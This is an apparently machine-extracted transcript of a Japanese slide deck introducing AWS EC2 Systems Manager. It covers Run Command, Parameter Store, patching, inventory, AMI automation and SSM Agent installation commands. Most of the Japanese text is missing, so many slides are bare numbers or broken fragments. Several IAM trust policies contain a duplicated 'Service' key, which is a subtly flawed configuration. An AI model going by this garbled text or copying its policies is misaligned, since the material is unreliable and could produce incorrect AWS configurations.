AWS Systems manager 入門

Download AWS Systems manager 入門

Post on 21-Jan-2018

2.780 views

Category:

Services

0 download

TRANSCRIPT

  1. 1. Amazon EC2 Systems Manager Amazon EC2 2017/06
  2. 2. Amazon EC2 Systems Manager Amazon EC2 Systems Manager Amazon EC2 Systems Manager Amazon EC2 Systems Manager 2
  3. 3.
  4. 4. 4
  5. 5. 5
  6. 6. AWS Excel AWS 6
  7. 7. Amazon EC2 Systems Manager
  8. 8. Amazon EC2 Systems Manager OS Windows Linux AWS ConfigAWS Systems ManagerOS 8
  9. 9. Amazon EC2 Systems Manager Systems Manager Run Command 9
  10. 10. Run Command JSON S3SNS SSHRDP Cloud Automator 10
  11. 11. Run Command [] 11
  12. 12. OS OS JSON EC2 12
  13. 13. 13
  14. 14. EC2 AWS JSON AWS Config 14
  15. 15. [] 15
  16. 16. AWS ConfigSSM 16
  17. 17. OS etc Run Command RDSMaintenance Window Cloud Automator 17
  18. 18. 18
  19. 19. 3 Maintenance Window 19
  20. 20. Cron 20
  21. 21. Cron 21
  22. 22. : : : 22
  23. 23. : : 23
  24. 24. 24
  25. 25. 25
  26. 26. Windows Patch Baseline 1 Maintenance Window 26
  27. 27. [],[ ],[] 27
  28. 28. 28
  29. 29. 29
  30. 30. 30
  31. 31. Amazon Machine Images(AMI) AMIEC2 AMI JSON 31
  32. 32. 32
  33. 33. IT DB Run CommnadState ManagerAutomation Management Console AWS CLISDK Parameter StoreKMS 33
  34. 34. 34
  35. 35. KMS 35
  36. 36. Run CommandAutomationState Manager AWS CLI() aws ssm get-parameters --name KMS AWS CLI() aws ssm get-parameters --names --with-decryption 36
  37. 37. IAM "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "ssm:Describe*", "ssm:Get*", "ssm:List*" ], "Resource": [ "arn:aws:ssm:ap-northeast-1:123456789123:parameter/prd.*" ] } ] "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "ssm:Describe*", "ssm:Get*", "ssm:List*" ], "Resource": [ "arn:aws:ssm:ap-northeast-1:123456789123:parameter/test.*" ] } ] 37
  38. 38. Systems Manager[] AWS 38
  39. 39. [Command],[Policy],[Automation]3 39
  40. 40. Command Run Command Policy Automation 40
  41. 41. Amazon EC2 Systems Manager
  42. 42. SSM Agent Systems ManagerSSM Agent AWSAPI AWSAMI 201611Windows AMI(2003-2012R22016) Amazon Linux Source CodeGithub https://github.com/aws/amazon-ssm-agent 42
  43. 43. EC2 Systems Manager OS Windows(32bit64bit) Windows Server 20032016(R2) Linux(32bit) Amazon Linux 2014.092014.03 Ubuntu Server 16.0.4 LTS14.04 LTS 12.04 LTS Red Hat Enterprise Linux (RHEL) 6.5 CentOS 6.3 Linux(64bit) Amazon Linux 2015.092015.03 Red Hat Enterprise Linux (RHEL) 7.x CentOS 7.1 43
  44. 44. EC2 Systems Manager SSM AgentAPI APIport 80,443 NAT-Gateway 44
  45. 45. EC2 Systems Manager SSM SSM 2017/06/23 45 OS Windows system Linux root
  46. 46. IAM RoleEC2 IAM Role SSM AgentAPI Automation ec2:CreateImage AWS AmazonSSMFullAccessAmazonSSMReadOnlyAccess 46
  47. 47. IAM RoleEC2 IAM RoleEC22017/02/12 https://aws.amazon.com/jp/blogs/news/new-attach-an-aws-iam-role-to-an-existing-amazon-ec2-instance-by-using-the-aws-cli/ 47
  48. 48. Amazon EC2 Systems Manager EC2
  49. 49. SSM Agent(Windows on EC2) AWSWindows AMI 201611AMIWindows 201611AMIWindows SSM Agent EC2Config Run CommandAWS-UpdateEC2Config Windows Server 2016AWS-UpdateSSMAgent 49
  50. 50. SSM Agent(Windows on EC2) 50
  51. 51. SSM Agent(Windows on EC2) Windows Server 2016AWS-UpdateSSMAgent Windows Server 2012AWS-UpdateEC2Config 51
  52. 52. SSM Agent(Windows on EC2) 52
  53. 53. SSM Agent(Windows on EC2) Run 53
  54. 54. SSM Agent(Windows on EC2) 54
  55. 55. SSM Agent(Windows on EC2) 55
  56. 56. SSM Agent(Windows on EC2) 56
  57. 57. SSM Agent(Windows on EC2) 57
  58. 58. SSM Agent(Windows on EC2) 58
  59. 59. SSM Agent(Linux on EC2) SSM Agent (S3) https://amazon-ssm-region.s3.amazonaws.com/latest/$arch/amazon-ssm- agent.rpm regionRegion $arch sudo yum install -y amazon-ssm-agent.rpm sudo dpkg -i amazon-ssm-agent.deb URL http://docs.aws.amazon.com/ja_jp/systems-manager/latest/userguide/ssm- agent.html 59
  60. 60. SSM Agent(Linux on EC2) SSM Agent (S3) Amazon LinuxRHEL CentOS 64 : https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast- 1/latest/linux_amd64/amazon-ssm-agent.rpm Amazon LinuxRHEL CentOS 32 : https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast- 1/latest/linux_386/amazon-ssm-agent.rpm Ubuntu Server 64 : https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast- 1/latest/debian_amd64/amazon-ssm-agent.deb Ubuntu Server 32 : https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast- 1/latest/debian_386/amazon-ssm-agent.deb 60
  61. 61. Amazon EC2 Systems Manager
  62. 62. Systems Manager 62
  63. 63. 63
  64. 64. IAM 64
  65. 65. 65
  66. 66. 66
  67. 67. Systems ManagerAWS 67
  68. 68. roleSystems ManagerAWS IAM[] 68
  69. 69. [Amazon EC2 Role for Simple Systems Manager] 69
  70. 70. AmazonEC2RoleforSSM 70
  71. 71. [] 71
  72. 72. { "Version": "2012-10-17", "Statement": { "Effect": "Allow", "Principal": {"Service": "ssm.amazonaws.com"}, "Action": "sts:AssumeRole" } } 72
  73. 73. Windows Windows[AWS Tools for Windows PowerShell] https://aws.amazon.com/jp/powershell/ 73
  74. 74. Windows Windows PowerShell for AWS code: id:ID region: Systems Manager $dir = $env:TEMP + "ssm" New-Item -ItemType directory -Path $dir cd $dir (New-Object System.Net.WebClient).DownloadFile("https://amazon-ssm- region.s3.amazonaws.com/latest/windows_amd64/AmazonSSMAgentSetup.exe", $dir + "AmazonSSMAgentSetup.exe") Start-Process .AmazonSSMAgentSetup.exe -ArgumentList @("/q", "/log", "install.log", "CODE=code", "ID=id", "REGION=region") -Wait Get-Content ($env:ProgramData + "AmazonSSMInstanceDataregistration") Get-Service -Name "AmazonSSMAgent" 74
  75. 75. Windows 75
  76. 76. ID:[mi-] 76
  77. 77. 77
  78. 78. Linux code: id: ID region: Systems Manager 78
  79. 79. Linux Amazon LinuxRHEL 6.xCentOS 6.x mkdir /tmp/ssm sudo curl https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm- agent.rpm -o /tmp/ssm/amazon-ssm-agent.rpm sudo yum install -y /tmp/ssm/amazon-ssm-agent.rpm sudo stop amazon-ssm-agent sudo amazon-ssm-agent -register -code "code" -id "id" -region "region" sudo start amazon-ssm-agent 79
  80. 80. Linux RHEL 7.x CentOS 7.x mkdir /tmp/ssm sudo curl https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm- agent.rpm -o /tmp/ssm/amazon-ssm-agent.rpm sudo yum install -y /tmp/ssm/amazon-ssm-agent.rpm sudo systemctl stop amazon-ssm-agent sudo amazon-ssm-agent -register -code "code" -id "id" -region "region" sudo systemctl start amazon-ssm-agent 80
  81. 81. Linux Ubuntu mkdir /tmp/ssm sudo curl https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/debian_amd64/amazon-ssm- agent.deb -o /tmp/ssm/amazon-ssm-agent.deb sudo dpkg -i /tmp/ssm/amazon-ssm-agent.deb sudo service amazon-ssm-agent stop sudo amazon-ssm-agent -register -code "code" -id "id" -region "region" sudo service amazon-ssm-agent start 81
  82. 82. Linux (RHEL7.3) 82
  83. 83. ID:mi- 83
  84. 84. Amazon EC2 Systems Manager
  85. 85. Amazon EC2 Systems Manager Windows IT AMI 85
  86. 86. Windows Systems Manager[][] Windows 86
  87. 87. Windows Systems Manager[]IAM 87
  88. 88. Windows [AWS ]-[Amazon EC2] 88
  89. 89. Windows [AmazonSSMMaintenanceWindowRole] 89
  90. 90. Windows 90
  91. 91. Windows []IAM 91
  92. 92. Windows [ssm.amazonaws.com] 92 { "Version": "2012-10-17", "Statement": [ { "Sid": "", "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com", "Service": "ssm.amazonaws.com" }, "Action": "sts:AssumeRole" } ] }
  93. 93. Windows IAM[ssm.amazonaws.com] 93
  94. 94. Windows 94
  95. 95. Windows Product: OS Classification: Severity: Auto Approval Delay: 95
  96. 96. Windows 96
  97. 97. Windows EC2 [Patch Group] [Patch Group] 97
  98. 98. Windows [Patch Group] 98
  99. 99. Windows 99
  100. 100. Windows 10
  101. 101. Windows Patch Group 10
  102. 102. Windows 10
  103. 103. Windows [AWS-ApplyPatchBaseline] 10
  104. 104. Windows [Scan][Install] Scan: Install: Patch Manager Systems Manager 10
  105. 105. Windows IAM []IAM 105
  106. 106. Windows [] 106
  107. 107. Windows / [][AWS-ApplyPatchBaseline] 107
  108. 108. Windows AMI AMICloud Automator 108
  109. 109. IT Systems Manager 109
  110. 110. IT 110 [][]
  111. 111. IT 111
  112. 112. IT [] 112
  113. 113. IT 30 113
  114. 114. IT 114
  115. 115. IT [S3] 115
  116. 116. IT [] 116
  117. 117. IT [][inventory Type] 117
  118. 118. IT AWS Config 118
  119. 119. IT 119
  120. 120. IT 120
  121. 121. AMI []AMI AMI 121 http://docs.aws.amazon.com/ja_jp/systems-manager/latest/userguide/sysman-ami-consolewalk.html
  122. 122. AMI []Sysytems Manager AutomationIAM AutomationEC2IAM2 122 http://docs.aws.amazon.com/ja_jp/systems-manager/latest/userguide/sysman-ami-consolewalk.html
  123. 123. AMI []IAM 123
  124. 124. AMI [AWS ]-[Amazon EC2] 124
  125. 125. AMI [AmazonSSMAutomationRole] 125
  126. 126. AMI Automation 126
  127. 127. AMI []ARN 127
  128. 128. AMI [Automation]IAM 128
  129. 129. AMI [ssm.amazonaws.com] 129 { "Version": "2012-10-17", "Statement": [ { "Sid": "", "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com", "Service": "ssm.amazonaws.com" }, "Action": "sts:AssumeRole" } ] }
  130. 130. AMI IAM[ssm.amazonaws.com] 130
  131. 131. AMI EC2IAM 131
  132. 132. AMI [AWS ]-[Amazon EC2] 132
  133. 133. AMI [AmazonEC2RolesorSSM] 133
  134. 134. AMI EC2 134
  135. 135. AMI [ssm.amazonaws.com] 135 { "Version": "2012-10-17", "Statement": [ { "Sid": "", "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com", "Service": "ssm.amazonaws.com" }, "Action": "sts:AssumeRole" } ] }
  136. 136. AMI IAM[ssm.amazonaws.com] 136
  137. 137. AMI [EC2]IAM 137
  138. 138. AMI [ssm.amazonaws.com] 138 { "Version": "2012-10-17", "Statement": [ { "Sid": "", "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com", "Service": "ssm.amazonaws.com" }, "Action": "sts:AssumeRole" } ] }
  139. 139. AMI IAM[ssm.amazonaws.com] 139
  140. 140. AMI [Automation]IAM 140
  141. 141. AMI PassRoleEC2IAM PassRole 141 { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "iam:PassRole" ], "Resource": [ " arn:aws:iam::xxxxxxxxxxx:role/AmazonEC2RoleforSSM" ] } ] }
  142. 142. AMI AMIAMIAMI ID 142
  143. 143. AMI [][] 143
  144. 144. AMI [AWS-UpdateLinuxAmi] [1] 144
  145. 145. AMI [] 145
  146. 146. AMI 146 SourceAmiId AMI ID InstanceIamRole EC2IAM AutomationAssumeRole AutomationIAMARN TargetAmiName AMI InstanceType PreUpdateScript URL PostUpdateScript URL IncludePackages ExcludePackages
  147. 147. AMI [][] 147
  148. 148. AMI [][InProgress] 148
  149. 149. AMI [][] AMI 149
  150. 150. AMI [] AMI AMI ID LambdaAMI ID 150 AutomationLambda Parameter Store AMI AMI Auto Scaling
  151. 151.
  152. 152. Systems ManagerAWS/ OS Systems ManagerJSON[] 152
  153. 153. JSON 153
  154. 154. Systems ManagerCloud Automator Systems ManagerIAMJSON Cloud Automator GUI 154 Systems Manager Cloud Automator SQS OS SSM SSM
  155. 155. 155
  156. 156. Systems Manager Systems Manager 156